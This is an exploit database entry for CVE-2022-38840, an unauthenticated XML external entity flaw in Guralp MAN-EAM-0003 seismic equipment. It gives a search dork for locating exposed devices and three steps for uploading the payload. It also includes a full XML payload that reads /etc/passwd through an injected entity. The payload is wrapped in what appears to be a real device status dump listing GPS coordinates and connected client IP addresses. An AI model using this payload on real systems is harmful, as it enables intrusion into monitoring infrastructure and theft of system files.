Lucene search
Ahmed AlrokyEDB-ID:51037HistoryMar 23, 2023 - 12:00 a.m.
MAN-EAM-0003 V3.2.4 - XXE
2023-03-2300:00:00
Ahmed Alroky
www.exploit-db.com
87
exploit
vulnerability
unauthorized access
xxe
xml
/etc/passwd
guralp
cve-2022-38840
windows
file upload
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.125 Low
EPSS
Percentile
95.5%
# Exploit Title: MAN-EAM-0003 V3.2.4 - XXE
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: http://guralp.com/
# Version: 3.2.4
# Authentication Required: NO
# CVE : CVE-2022-38840
# Google dork: " webconfig menu.cgi "
# Tested on: Windows
# Exploit
1 - browse to http://<Host<http://%3cHost> name>/cgi-bin/xmlstatus.cgi
2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form
3 - you will get /etc/passwd file content
#XML exploit code
```
<?xml version='1.0'?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]>
<xml-status xmlns='http://www.guralp.com/platinum/xmlns/xmlstatus/1.1'>
<module status='-1' display-primary='true' path='das' title='Data acquisition'>
<reading status='100' display-primary='false' path='is_faulty'
title='Fault condition'>false</reading>
<reading status='-1' display-primary='false' path='dsp_tag'
title='DSP code tag'>platinum</reading>
<reading status='-1' display-primary='false' path='dsp_version'
title='DSP code version'>102</reading>
<reading status='100' display-primary='true' path='dsp_state'
title='Acquisition hardware module'>running</reading>
<reading status='-1' display-primary='true' path='reference_clock'
title='Reference clock type'>GPS</reading>
<reading status='100' display-primary='false' path='clock_controller'
title='ADC clock controller state'>FLL</reading>
<reading status='-1' display-primary='false' path='clock_control_val'
title='ADC clock controller value'>46196</reading>
<reading status='100' display-primary='true' path='clock_locked'
title='ADC clock locked'>true</reading>
<reading status='-1' display-primary='true' path='clock_last_locked'
title='ADC clock last locked at'>2022-06-14T11:26:53Z</reading>
<reading status='100' display-primary='true' path='clock_phase_error' units='s'
title='ADC clock phase error'>6.1e-08</reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.0' title='Sensor A'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
<reading status='96' display-primary='true' path='mass_Z'
title='Z mass position'>4.6%</reading>
<reading status='100' display-primary='true' path='mass_N'
title='N mass position'>-0.3%</reading>
<reading status='100' display-primary='true' path='mass_E'
title='E mass position'>-0.3%</reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.1' title='Sensor B'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.X' title='Auxiliary'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
</module>
<module status='-1' display-primary='true' path='gcf-out-scream.default' title='Scream server (GCF network sender)'>
<reading status='100' display-primary='true' path='total_blocks'
title='Total number of blocks sent'>11374055</reading>
<reading status='100' display-primary='true' path='last5_blocks'
title='Number of blocks sent in last 5 minutes'>331</reading>
<reading status='-1' display-primary='false' path='port_number'
title='Port listening on'>1567</reading>
<reading status='-1' display-primary='true' path='num_clients'
title='Number of clients connected'>0</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='false' path='gdi-base.default' title='Default data transport daemon'>
<reading status='100' display-primary='true' path='num_channels'
title='Number of channels'>16</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of connected clients'>5</reading>
<reading status='100' display-primary='true' path='num_samples'
title='Number of samples received'>7338920142</reading>
<reading status='100' display-primary='true' path='last5_samples'
title='Number of samples in last 5 minutes'>213600</reading>
<list status='-1' display-primary='false' path='clients' title='Clients'>
<list-item status='-1' display-primary='false' path='44B02216' title='Client #1'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi2gcf[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='1CC104A5' title='Client #2'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi-link-tx[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='9D9E4553' title='Client #3'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi2miniseed[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='4B1427EC' title='Client #4'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>das-in</reading>
</list-item>
<list-item status='-1' display-primary='false' path='412FD3EB' title='Client #5'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>das-in-textstatus</reading>
</list-item>
</list>
<list status='-1' display-primary='false' path='channels' title='Channels'>
<list-item status='-1' display-primary='false' path='38B5E770' title='Channel #1'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHZ.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='7B77F21B' title='Channel #2'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHN.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='B55019F4' title='Channel #3'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHE.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='35ED217B' title='Channel #4'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HDF.TM.X0</reading>
</list-item>
<list-item status='-1' display-primary='false' path='8062D6AB' title='Channel #5'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNZ.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='2099C9F1' title='Channel #6'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNN.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='DE833721' title='Channel #7'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNE.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='5510ED44' title='Channel #8'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MMZ.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='ACFA260E' title='Channel #9'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MMN.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='5BED382E' title='Channel #10'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MME.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='67453FF7' title='Channel #11'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.0</reading>
</list-item>
<list-item status='-1' display-primary='false' path='1D34DF0D' title='Channel #12'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-AIB</reading>
</list-item>
<list-item status='-1' display-primary='false' path='A11AEDBA' title='Channel #13'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.1</reading>
</list-item>
<list-item status='-1' display-primary='false' path='2DBCFF6E' title='Channel #14'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-BIB</reading>
</list-item>
<list-item status='-1' display-primary='false' path='9D7CDB17' title='Channel #15'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.X</reading>
</list-item>
<list-item status='-1' display-primary='false' path=' 8A3C070' title='Channel #16'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-XIB</reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='gdi-link-tx.default' title='System gdi-link transmitter'>
<reading status='100' display-primary='true' path='total_bytes_sent' units='bytes'
title='Total number of bytes sent'>11273973132</reading>
<reading status='100' display-primary='true' path='last5_bytes_sent'
title='Number of bytes sent in last 5 minutes'>325518</reading>
<reading status='100' display-primary='true' path='tx_rate'
title='Transmit rate over last 5 minutes'>1085.06</reading>
<reading status='-1' display-primary='false' path='port_number'
title='Port listening on'>1565</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of clients'>0</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='true' path='gdi2gcf.default' title='GCF compressor. Default instance'>
<reading status='100' display-primary='true' path='num_samples_in'
title='Total number of samples in'>7439096490</reading>
<reading status='100' display-primary='true' path='last5_samples_in'
title='Number of samples in in last 5 minutes'>216516</reading>
<reading status='100' display-primary='true' path='num_blocks_out'
title='Total number of blocks out'>11374055</reading>
<reading status='100' display-primary='true' path='last5_blocks_out'
title='Number of blocks out in last 5 minutes'>331</reading>
<list status='-1' display-primary='false' path='channels' title='Channels'>
<list-item status='-1' display-primary='true' path='10D33176' title='DONB.HHZ.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AZ0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='39355EAD' title='DONB.HHN.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AN0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 380425E' title='DONB.HHE.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AE0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:45.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='E6EAF8A3' title='DONB.HDF.TM.X0'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-XX0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:35.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='45B1141C' title='DONB.HNZ.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BZ0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:48.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 9951403' title='DONB.HNN.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BN0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:42.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='3B38B4CE' title='DONB.HNE.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BE0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:40.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='3E12CA7F' title='DONB.MMZ.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AM8</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:24:48.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='F194038D' title='DONB.MMN.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AM9</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:23:47.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='80F951F3' title='DONB.MME.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AMA</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:23:57.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path=' DCFFBA' title='DONB.SOH.TM.0'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-A00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='F2D860DE' title='DONB-AIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='8B4D513B' title='DONB.SOH.TM.1'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-B00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='5CC9B084' title='DONB-BIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='B4418B8A' title='DONB.SOH.TM.X'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-X00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='AB7AFF68' title='DONB-XIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-XIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='gdi2miniseed.default' title='Mini-SEED compressor. Default instance'>
<reading status='100' display-primary='true' path='num_samples_in'
title='Total number of data samples in'>6184483152</reading>
<reading status='100' display-primary='true' path='last5_samples_in'
title='Number of samples in last 5 minutes'>180000</reading>
<reading status='100' display-primary='true' path='num_text_in'
title='Total number of text samples in'>0</reading>
<reading status='100' display-primary='true' path='last5_text_in'
title='Number of text samples in last 5 minutes'>0</reading>
<reading status='100' display-primary='true' path='num_ms_rec_out'
title='Total number of Miniseed records out'>22682743</reading>
<reading status='100' display-primary='true' path='last5_ms_rec_out'
title='Number of Miniseed records out in last 5 minutes'>655</reading>
</module>
<module status='-1' display-primary='true' path='gps' title='GPS'>
<reading status='100' display-primary='true' path='have_data'
title='GPS data received'>true</reading>
<reading status='100' display-primary='false' path='last_data'
title='Last data received from GPS'>2022-06-14T11:26:53Z</reading>
<reading status='100' display-primary='true' path='fix'
title='Fix'>3D</reading>
<reading status='100' display-primary='true' path='last_fix'
title='Timestamp of last fix'>2022-06-14T11:26:53Z</reading>
<reading status='-1' display-primary='true' path='latitude' units='°'
title='Latitude'>13.909917</reading>
<reading status='-1' display-primary='true' path='longitude' units='°'
title='Longitude'>100.593734</reading>
<reading status='-1' display-primary='true' path='elevation' units='m'
title='Elevation'>3</reading>
<reading status='100' display-primary='true' path='sv_count'
title='Count of satellites in view'>26</reading>
<reading status='100' display-primary='true' path='sv_used'
title='Count of satellites used in fix'>12</reading>
<reading status='-1' display-primary='true' path='sv_online'
title='Timestamp of last nmea sentence'>2022-06-14T11:26:52Z</reading>
<reading status='100' display-primary='true' path='rs232_detect'
title='RS232 device detect'>true</reading>
</module>
<module status='-1' display-primary='true' path='ntp' title='NTP'>
<reading status='-1' display-primary='false' path='mode'
title='Timing mode'>direct_gps</reading>
<reading status='-1' display-primary='true' path='mode_desc'
title='Timing mode'>NTP is using a GPS reference source.</reading>
<reading status='100' display-primary='true' path='locked'
title='Clock locked'>true</reading>
<reading status='100' display-primary='true' path='estimated_error' units='s'
title='Estimated error'>0.000131</reading>
<reading status='-1' display-primary='true' path='clock_source'
title='Clock source'>GPS</reading>
<reading status='-1' display-primary='false' path='peer'
title='Peer'>127.127.28.1</reading>
<reading status='-1' display-primary='false' path='peer_refid'
title='Peer's reference ID'>GPS</reading>
</module>
<module status='-1' display-primary='true' path='seedlink-out.0' title='SEEDlink network server (instance 1)'>
<reading status='-1' display-primary='true' path='num_records'
title='Total number of records seen'>22682743</reading>
<reading status='100' display-primary='true' path='last5_records'
title='Number of records seen in last 5 minutes'>655</reading>
<reading status='-1' display-primary='true' path='seq'
title='Current sequence number'>3382931</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of clients connected'>7</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
<list-item status='-1' display-primary='true' path='2DF96A1C' title='Client #1700'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>123.160.221.22</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>21100</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>0</reading>
</list-item>
<list-item status='-1' display-primary='true' path='79C29121' title='Client #3412'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>113.53.234.98</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>33964</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>0</reading>
</list-item>
<list-item status='-1' display-primary='true' path='5060E6FF' title='Client #3581'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>203.114.125.67</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>48666</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3221351</reading>
</list-item>
<list-item status='-1' display-primary='true' path='B1A1AB18' title='Client #3723'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>113.53.234.98</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>45158</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 91FC71C' title='Client #3720'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>221.128.101.50</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>55776</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path='599CD113' title='Client #3721'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>118.175.2.50</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>60818</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path='BAB80847' title='Client #3722'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>203.114.125.67</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>53984</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='storage' title='Storage'>
<reading status='100' display-primary='true' path='state'
title='State'>Inactive</reading>
<reading status='100' display-primary='true' path='recording_state'
title='Recording state'>Last flush good</reading>
<reading status='-1' display-primary='true' path='last_accessed'
title='Last accessed'>2022-06-14T08:10:14Z</reading>
<reading status='-1' display-primary='true' path='free_space_pct'
title='Free space'>27.2%</reading>
<reading status='-1' display-primary='false' path='free_space' units='bytes'
title='Available space'>17449811968</reading>
<reading status='-1' display-primary='true' path='size' units='bytes'
title='Storage size'>64134021120</reading>
<reading status='100' display-primary='false' path='fs_type'
title='Filesystem type'>VFAT</reading>
<list status='-1' display-primary='false' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='true' path='system' title='Linux system'>
<reading status='-1' display-primary='false' path='serial_number'
title='Serial number'>DAS-405D62</reading>
<reading status='-1' display-primary='true' path='uptime' units='s'
title='System uptime'>10307538</reading>
<reading status='-1' display-primary='true' path='load_average'
title='Load Average'>1.72</reading>
<reading status='100' display-primary='true' path='root_free_space' units='bytes'
title='Root filesystem free space'>437809152</reading>
<reading status='100' display-primary='true' path='root_percent_free_space'
title='Root filesystem percentage space free'>77.0%</reading>
<reading status='-1' display-primary='true' path='build_label'
title='Software repository label'>&example;</reading>
<reading status='-1' display-primary='true' path='build_version'
title='Software build number'>15809</reading>
<reading status='-1' display-primary='true' path='build_machine'
title='Build machine'>CMG-DAS</reading>
<reading status='-1' display-primary='true' path='last_reboot_1'
title='Reboot 1'>2021-04-08T05:06:17Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_2'
title='Reboot 2'>2021-04-08T07:02:50Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_3'
title='Reboot 3'>2021-04-08T08:00:33Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_4'
title='Reboot 4'>2021-04-08T08:30:41Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_5'
title='Reboot 5'>2021-04-08T08:39:15Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_6'
title='Reboot 6'>2021-04-08T08:46:24Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_7'
title='Reboot 7'>2021-04-08T10:08:51Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_8'
title='Reboot 8'>2021-04-09T07:10:41Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_9'
title='Reboot 9'>2021-10-07T06:48:35Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_10'
title='Reboot 10'>2022-02-15T04:14:30Z</reading>
<reading status='100' display-primary='true' path='temperature' units='°C'
title='System temperature'>43.875</reading>
<reading status='100' display-primary='true' path='voltage' units='V'
title='Power supply voltage'>12.75</reading>
<reading status='100' display-primary='true' path='current' units='A'
title='Power supply current'>0.442</reading>
<reading status='100' display-primary='true' path='sensor_A_voltage' units='V'
title='Sensor A voltage'>12.675</reading>
<reading status='100' display-primary='true' path='sensor_A_current' units='A'
title='Sensor A current'>0.289</reading>
<reading status='100' display-primary='true' path='sensor_B_voltage' units='V'
title='Sensor B voltage'>12.725</reading>
<reading status='100' display-primary='true' path='sensor_B_current' units='A'
title='Sensor B current'>0.002</reading>
</module>
</xml-status>
```Related
nvd
nvd
CVE-2022-38840
2023-04-16 02:15:08
prion
prion
Xxe
2023-04-16 02:15:00
cve
cve
CVE-2022-38840
2023-04-16 02:15:08
cvelist
cvelist
CVE-2022-38840
2023-04-16 00:00:00
zdt
zdt
MAN-EAM-0003 V3.2.4 - XML External Entity (XXE) Vulnerability
2023-03-23 00:00:00
packetstorm
packetstorm
MAN-EAM-0003 3.2.4 XML Injection
2023-03-24 00:00:00
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.125 Low
EPSS
Percentile
95.5%
Related for EDB-ID:51037